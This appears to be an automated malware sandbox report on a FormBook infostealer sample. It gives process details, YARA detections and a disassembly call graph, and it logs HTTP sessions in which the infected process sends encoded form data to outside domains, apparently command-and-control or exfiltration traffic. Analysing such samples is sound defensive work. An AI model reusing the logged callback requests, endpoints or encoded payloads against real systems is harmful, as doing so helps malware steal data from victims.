                                                                                40192.168.2.750012199.59.243.227807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:34:26.356112003 CET494OUTGET /pvrm/?GhEtuH=q9VU5shSkDSssKORJVQgPyBT6NXL0uGF1tcH5gjeNKzzvUK22qQBZnHtscqLZ9MjFbahEO+8XCavPFU5GWG6ZiikqcFlEViNL/eErSple439PFpGhjhhgUgyeLHF+kDRjmkJ2QCUDUlW&9hy=gvrDS8U8OP HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.dating-ml-es.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Dec 4, 2024 15:34:27.407686949 CET1236INHTTP/1.1 200 OK
                                                                                date: Wed, 04 Dec 2024 14:34:26 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1518
                                                                                x-request-id: 34a6bf29-539a-425d-8de0-f3f082cdda77
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HVDYtGfc4OTPYr3WuZBkAZ6nhEKoONsJKazVjnxitAJBGgImAynIzh+ynT71SdVqBg3bBkmr3z3WgccqXV/Iqg==
                                                                                set-cookie: parking_session=34a6bf29-539a-425d-8de0-f3f082cdda77; expires=Wed, 04 Dec 2024 14:49:27 GMT; path=/
                                                                                connection: close
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 48 56 44 59 74 47 66 63 34 4f 54 50 59 72 33 57 75 5a 42 6b 41 5a 36 6e 68 45 4b 6f 4f 4e 73 4a 4b 61 7a 56 6a 6e 78 69 74 41 4a 42 47 67 49 6d 41 79 6e 49 7a 68 2b 79 6e 54 37 31 53 64 56 71 42 67 33 62 42 6b 6d 72 33 7a 33 57 67 63 63 71 58 56 2f 49 71 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HVDYtGfc4OTPYr3WuZBkAZ6nhEKoONsJKazVjnxitAJBGgImAynIzh+ynT71SdVqBg3bBkmr3z3WgccqXV/Iqg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Dec 4, 2024 15:34:27.407888889 CET971INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzRhNmJmMjktNTM5YS00MjVkLThkZTAtZjNmMDgyY2RkYTc3IiwicGFnZV90aW1lIjoxNzMzMzIyOD


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                41192.168.2.75001385.159.66.93807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:34:33.678714991 CET750OUTPOST /912o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.soainsaat.xyz
                                                                                Origin: http://www.soainsaat.xyz
                                                                                Content-Length: 219
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.soainsaat.xyz/912o/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 32 32 30 43 36 64 69 36 72 4b 63 4c 74 79 53 39 42 6a 6f 39 38 30 6c 75 6a 56 57 75 58 58 72 43 38 50 2b 2f 75 6e 66 6d 39 45 68 64 76 58 6b 4b 56 46 48 64 66 69 71 51 67 57 42 63 38 56 4f 34 6c 30 78 50 35 50 48 6d 39 75 35 52 44 53 37 4b 63 4a 5a 6f 32 32 73 7a 65 73 77 6e 34 2b 39 76 61 71 62 75 6c 41 2f 47 74 37 33 58 4e 54 37 4b 59 4c 6d 53 35 6e 32 50 43 2b 36 31 36 67 6b 46 76 62 46 32 4f 37 72 72 4d 55 53 58 52 39 46 66 55 7a 2f 6c 50 79 45 65 6d 53 38 6b 77 66 52 54 4e 39 72 6e 74 4e 54 48 4b 2b 4a 50 2b 70 41 32 42 43 34 54 49 49 66 33 73 55 57 50 6d 55 6c 49 46 4f 67 33 77 54 45 47 56 4b 42 73 57 50 37 57 2f 67 3d 3d
                                                                                Data Ascii: GhEtuH=220C6di6rKcLtyS9Bjo980lujVWuXXrC8P+/unfm9EhdvXkKVFHdfiqQgWBc8VO4l0xP5PHm9u5RDS7KcJZo22szeswn4+9vaqbulA/Gt73XNT7KYLmS5n2PC+616gkFvbF2O7rrMUSXR9FfUz/lPyEemS8kwfRTN9rntNTHK+JP+pA2BC4TIIf3sUWPmUlIFOg3wTEGVKBsWP7W/g==


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                42192.168.2.75001485.159.66.93807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:34:36.356486082 CET770OUTPOST /912o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.soainsaat.xyz
                                                                                Origin: http://www.soainsaat.xyz
                                                                                Content-Length: 239
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.soainsaat.xyz/912o/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 32 32 30 43 36 64 69 36 72 4b 63 4c 73 54 69 39 48 45 55 39 36 55 6c 70 76 31 57 75 4e 6e 72 47 38 50 43 2f 75 6a 50 32 68 6d 46 64 76 7a 6f 4b 57 45 48 64 63 69 71 51 72 32 41 59 78 31 50 30 6c 30 39 78 35 4e 54 6d 39 71 5a 52 44 57 2f 4b 63 61 42 70 33 6d 73 78 57 4d 77 70 32 65 39 76 61 71 62 75 6c 41 44 38 74 2f 54 58 4e 69 4c 4b 5a 70 65 56 6e 58 32 4f 46 2b 36 31 73 51 6b 4a 76 62 46 59 4f 35 50 52 4d 57 71 58 52 35 4a 66 52 33 54 69 42 79 45 63 69 53 39 54 77 4f 73 50 56 6f 54 36 79 64 6a 68 46 38 52 31 2f 66 42 55 62 67 30 2f 57 5a 6e 4d 6f 57 79 35 78 79 34 39 48 50 6b 76 39 78 77 6e 4b 39 6b 47 62 64 61 53 70 64 4d 74 69 30 46 78 79 4a 55 76 77 78 75 34 64 31 36 6b 37 30 63 3d
                                                                                Data Ascii: GhEtuH=220C6di6rKcLsTi9HEU96Ulpv1WuNnrG8PC/ujP2hmFdvzoKWEHdciqQr2AYx1P0l09x5NTm9qZRDW/KcaBp3msxWMwp2e9vaqbulAD8t/TXNiLKZpeVnX2OF+61sQkJvbFYO5PRMWqXR5JfR3TiByEciS9TwOsPVoT6ydjhF8R1/fBUbg0/WZnMoWy5xy49HPkv9xwnK9kGbdaSpdMti0FxyJUvwxu4d16k70c=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                43192.168.2.75001585.159.66.93807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:34:39.306025982 CET1783OUTPOST /912o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.soainsaat.xyz
                                                                                Origin: http://www.soainsaat.xyz
                                                                                Content-Length: 1251
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.soainsaat.xyz/912o/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 32 32 30 43 36 64 69 36 72 4b 63 4c 73 54 69 39 48 45 55 39 36 55 6c 70 76 31 57 75 4e 6e 72 47 38 50 43 2f 75 6a 50 32 68 6d 4e 64 76 47 30 4b 56 6d 76 64 64 69 71 51 77 57 41 56 78 31 50 39 6c 30 56 31 35 4e 66 63 39 6f 68 52 44 7a 72 4b 49 37 42 70 39 6d 73 78 4a 63 77 6b 34 2b 39 36 61 71 4c 71 6c 41 7a 38 74 2f 54 58 4e 68 6a 4b 66 37 6d 56 6c 58 32 50 43 2b 36 48 36 67 6c 65 76 62 64 75 4f 35 4c 42 4d 6d 4b 58 52 64 6c 66 57 55 72 69 4a 79 45 61 76 79 39 4c 77 4f 67 6d 56 73 7a 63 79 64 6e 62 46 38 35 31 39 4c 31 43 5a 53 63 6d 46 34 71 59 72 46 65 4d 36 42 49 73 44 39 38 6b 31 67 55 47 44 4e 38 75 62 38 4b 79 39 4b 64 2f 6a 57 39 39 30 4a 6f 73 2b 45 66 6d 5a 48 4b 56 6f 44 53 4c 32 43 37 54 4a 6a 58 59 6c 79 6a 4c 6c 45 58 50 6b 6c 61 4a 57 6b 59 32 38 43 79 47 33 32 75 4c 4a 4b 46 77 49 62 6f 78 33 6e 32 6e 55 42 4a 67 47 4f 42 34 33 56 76 36 31 50 53 76 6a 39 6b 35 62 59 32 51 44 56 30 31 4a 70 4a 68 4f 4a 76 4f 63 6f 4b 46 31 48 50 55 62 63 64 4c 6b 6d 6a 6c 53 43 67 [TRUNCATED]
                                                                                Data Ascii: GhEtuH=220C6di6rKcLsTi9HEU96Ulpv1WuNnrG8PC/ujP2hmNdvG0KVmvddiqQwWAVx1P9l0V15Nfc9ohRDzrKI7Bp9msxJcwk4+96aqLqlAz8t/TXNhjKf7mVlX2PC+6H6glevbduO5LBMmKXRdlfWUriJyEavy9LwOgmVszcydnbF8519L1CZScmF4qYrFeM6BIsD98k1gUGDN8ub8Ky9Kd/jW990Jos+EfmZHKVoDSL2C7TJjXYlyjLlEXPklaJWkY28CyG32uLJKFwIbox3n2nUBJgGOB43Vv61PSvj9k5bY2QDV01JpJhOJvOcoKF1HPUbcdLkmjlSCg5zYwru39JVfndDzE4e3KwhDgzboU3IHsQoeKO0KXARY6gmdwlD3xz380navD5b3kU8+bdCJGqjkO8oMA1J4FPF/p/IMMaWZ59I35yjM6ef3hrZ0R3L0TeFfV78nIDpn58UatwTQfcEG7Cz0YXc0yrBjwTOlzPUaAMLA8R9oda8PCjZCs/s5pl5AN4ZVOfosf29nZclMYW8O/DC1LMla5hvhbPizjJdx5LDkJyna+BPrdwqTChGGJoNK/MCVMr/nySPo3ZELHvCqFDyGxw9S54Dtfcx4PAnKHp5V5XCaboc0NJKbrvbOpDHnxwEw6jexzyHAx36vKNM/wL6P6lVg5ge1XXpzbHZxRIMqyW78PvVTMIG4jVwrLicPjfY+1czsJJLzSrgNiWsUWxnYbdaBAyea7NbWcOAq1FnIv7kif8K2iV38JzDtC2HbbKDS7Tbl4SSB9EYh90BvVb58rZjdhq6TeJUa6os2PnvO/NBikZRShoQDPJlOfxZ1XrJZWon3r9GNS0VFWcl/5V+o6+5rGf3F1yEpXN6Elr90u4hTskDzuTw5HVbJaRnfvZA78rPDSKwx50nkQxn+A2/vUJ+Jri3j4+kIAfpZDHjNJq3YRUpYxacAP47PHgpjaCZ+BgM4iR3xntpzKK8z2mYgT730m2/99sf63GMxVOa [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                44192.168.2.75001685.159.66.93807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:34:42.000524998 CET491OUTGET /912o/?GhEtuH=70ci5pGKsfR7ryWTKFtFiUt7/TqIPHf64KC8vmTT6Dtcu2BtDGHTaTjOoGUC2iu8k3BJ4N7Du7dNBD6fJpU48FM3duIc/ctQLZHS0QyH+uuzGzjKGZHdmjrbFNuBsSBruIhtULDLHkLM&9hy=gvrDS8U8OP HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.soainsaat.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Dec 4, 2024 15:34:43.331453085 CET225INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.14.1
                                                                                Date: Wed, 04 Dec 2024 14:34:43 GMT
                                                                                Content-Length: 0
                                                                                Connection: close
                                                                                X-Rate-Limit-Limit: 5s
                                                                                X-Rate-Limit-Remaining: 19
                                                                                X-Rate-Limit-Reset: 2024-12-04T14:34:48.1158597Z


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                45192.168.2.75001938.63.190.200807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:34:49.032622099 CET765OUTPOST /4vk9/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.nicolemichelle.net
                                                                                Origin: http://www.nicolemichelle.net
                                                                                Content-Length: 219
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.nicolemichelle.net/4vk9/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 2f 4a 61 30 72 71 36 51 71 34 32 7a 43 4c 61 64 64 52 6f 73 52 76 6e 38 4a 70 53 63 52 79 69 53 32 53 34 6f 58 75 72 7a 42 74 59 50 73 31 46 56 2f 2b 41 6e 63 74 2f 77 53 32 2f 55 36 76 6e 67 30 33 53 47 31 78 6e 63 59 69 58 67 6a 68 53 62 59 44 52 47 4f 4b 77 43 52 63 42 65 5a 70 43 6d 36 77 2f 42 2b 6b 6e 42 75 72 39 56 69 58 6e 58 6e 78 61 34 6b 63 33 34 64 6f 2b 2b 39 64 67 42 62 4e 37 46 35 4f 61 31 42 6e 39 67 78 55 2b 44 4d 58 2f 43 2f 57 5a 36 7a 53 72 6c 32 7a 52 79 61 2f 6d 65 31 6f 4e 73 49 65 65 62 65 73 36 55 64 37 76 6a 63 38 2b 57 4c 2b 4f 58 49 4a 78 44 71 41 35 52 41 4b 32 32 74 34 68 5a 71 7a 70 54 79 41 3d 3d
                                                                                Data Ascii: GhEtuH=/Ja0rq6Qq42zCLaddRosRvn8JpScRyiS2S4oXurzBtYPs1FV/+Anct/wS2/U6vng03SG1xncYiXgjhSbYDRGOKwCRcBeZpCm6w/B+knBur9ViXnXnxa4kc34do++9dgBbN7F5Oa1Bn9gxU+DMX/C/WZ6zSrl2zRya/me1oNsIeebes6Ud7vjc8+WL+OXIJxDqA5RAK22t4hZqzpTyA==


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:09:30:41
                                                                                Start date:04/12/2024
                                                                                Path:C:\Users\user\Desktop\ek8LkB2Cgo.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\ek8LkB2Cgo.exe"
                                                                                Imagebase:0x4f0000
                                                                                File size:1'229'824 bytes
                                                                                MD5 hash:0E566D86BC0EB9416765E07F7BA17392
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:2
                                                                                Start time:09:30:43
                                                                                Start date:04/12/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\ek8LkB2Cgo.exe"
                                                                                Imagebase:0x820000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1542930105.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1542601983.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1543326979.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:5
                                                                                Start time:09:30:59
                                                                                Start date:04/12/2024
                                                                                Path:C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe"
                                                                                Imagebase:0xaa0000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3778462020.00000000030B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:6
                                                                                Start time:10:40:42
                                                                                Start date:04/12/2024
                                                                                Path:C:\Windows\SysWOW64\sethc.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\SysWOW64\sethc.exe"
                                                                                Imagebase:0xeb0000
                                                                                File size:81'920 bytes
                                                                                MD5 hash:AA9A6E4DADA121001CFDF184B9758BBE
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3778150312.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3778103471.0000000004960000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3771923815.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:7
                                                                                Start time:10:40:57
                                                                                Start date:04/12/2024
                                                                                Path:C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe"
                                                                                Imagebase:0xaa0000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3780336358.0000000005610000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:9
                                                                                Start time:10:41:09
                                                                                Start date:04/12/2024
                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                Imagebase:0x7ff722870000
                                                                                File size:676'768 bytes
                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:3.8%
                                                                                  Dynamic/Decrypted Code Coverage:0.4%
                                                                                  Signature Coverage:8.7%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:80
                                                                                  execution_graph 92782 569c06 92793 50d3be 92782->92793 92784 569c1c 92792 569c91 Mailbox 92784->92792 92875 4f1caa 49 API calls 92784->92875 92787 569cc5 92789 56a7ab Mailbox 92787->92789 92877 53cc5c 86 API calls 4 library calls 92787->92877 92790 569c71 92790->92787 92876 53b171 48 API calls 92790->92876 92802 503200 92792->92802 92794 50d3ca 92793->92794 92795 50d3dc 92793->92795 92878 4fdcae 50 API calls Mailbox 92794->92878 92797 50d3e2 92795->92797 92798 50d40b 92795->92798 92879 50f4ea 92797->92879 92888 4fdcae 50 API calls Mailbox 92798->92888 92801 50d3d4 92801->92784 92911 4fbd30 92802->92911 92804 503267 92805 5032f8 92804->92805 92806 56907a 92804->92806 92865 503628 92804->92865 92984 50c36b 86 API calls 92805->92984 93019 53cc5c 86 API calls 4 library calls 92806->93019 92810 569072 92810->92787 92812 503313 92863 5034eb _memcpy_s Mailbox 92812->92863 92812->92865 92869 5694df 92812->92869 92916 4f2b7a 92812->92916 92813 5691fa 93034 53cc5c 86 API calls 4 library calls 92813->93034 92814 50c3c3 48 API calls 92814->92863 92818 56926d 93038 53cc5c 86 API calls 4 library calls 92818->93038 92819 5693c5 92822 4ffe30 335 API calls 92819->92822 92820 56909a 92820->92813 93020 4fd645 92820->93020 92824 569407 92822->92824 92824->92865 93043 4fd6e9 92824->93043 92826 569114 92838 569128 92826->92838 92849 569152 92826->92849 92827 569220 93035 4f1caa 49 API calls 92827->93035 92829 5033ce 92832 503465 92829->92832 92833 56945e 92829->92833 92829->92863 92840 50f4ea 48 API calls 92832->92840 93048 53c942 50 API calls 92833->93048 93030 53cc5c 86 API calls 4 library calls 92838->93030 92854 50346c 92840->92854 92841 569438 93047 53cc5c 86 API calls 4 library calls 92841->93047 92842 56923d 92843 569252 92842->92843 92844 56925e 92842->92844 93036 53cc5c 86 API calls 4 library calls 92843->93036 93037 53cc5c 86 API calls 4 library calls 92844->93037 92851 569177 92849->92851 92855 569195 92849->92855 92850 50f4ea 48 API calls 92850->92863 93031 54f320 335 API calls 92851->93031 92859 50351f 92854->92859 92923 4fe8d0 92854->92923 92856 56918b 92855->92856 93032 54f5ee 335 API calls 92855->93032 92856->92865 93033 50c2d6 48 API calls _memcpy_s 92856->93033 92862 503540 92859->92862 93049 4f6eed 92859->93049 92862->92865 92868 5694b0 92862->92868 92871 503585 92862->92871 92863->92814 92863->92818 92863->92819 92863->92820 92863->92841 92863->92850 92863->92859 92864 569394 92863->92864 92863->92865 92986 4fd9a0 53 API calls __cinit 92863->92986 92987 4fd8c0 53 API calls 92863->92987 92988 50c2d6 48 API calls _memcpy_s 92863->92988 92989 4ffe30 92863->92989 93039 54cda2 82 API calls Mailbox 92863->93039 93040 5380e3 53 API calls 92863->93040 93041 4fd764 55 API calls 92863->93041 93042 4fdcae 50 API calls Mailbox 92863->93042 92867 50f4ea 48 API calls 92864->92867 92874 503635 Mailbox 92865->92874 93018 53cc5c 86 API calls 4 library calls 92865->93018 92867->92819 93053 4fdcae 50 API calls Mailbox 92868->93053 92869->92865 93054 53cc5c 86 API calls 4 library calls 92869->93054 92871->92865 92871->92869 92872 503615 92871->92872 92985 4fdcae 50 API calls Mailbox 92872->92985 92874->92787 92875->92790 92876->92792 92877->92789 92878->92801 92881 50f4f2 __calloc_impl 92879->92881 92882 50f50c 92881->92882 92883 50f50e std::exception::exception 92881->92883 92889 51395c 92881->92889 92882->92801 92903 516805 RaiseException 92883->92903 92885 50f538 92904 51673b 47 API calls _free 92885->92904 92887 50f54a 92887->92801 92888->92801 92890 5139d7 __calloc_impl 92889->92890 92892 513968 __calloc_impl 92889->92892 92910 517c0e 47 API calls __getptd_noexit 92890->92910 92891 513973 92891->92892 92905 5181c2 47 API calls __NMSG_WRITE 92891->92905 92906 51821f 47 API calls 5 library calls 92891->92906 92907 511145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 92891->92907 92892->92891 92895 51399b RtlAllocateHeap 92892->92895 92898 5139c3 92892->92898 92901 5139c1 92892->92901 92895->92892 92896 5139cf 92895->92896 92896->92881 92908 517c0e 47 API calls __getptd_noexit 92898->92908 92909 517c0e 47 API calls __getptd_noexit 92901->92909 92903->92885 92904->92887 92905->92891 92906->92891 92908->92901 92909->92896 92910->92896 92912 4fbd3f 92911->92912 92915 4fbd5a 92911->92915 93055 4fbdfa 92912->93055 92914 4fbd47 CharUpperBuffW 92914->92915 92915->92804 92917 4f2b8b 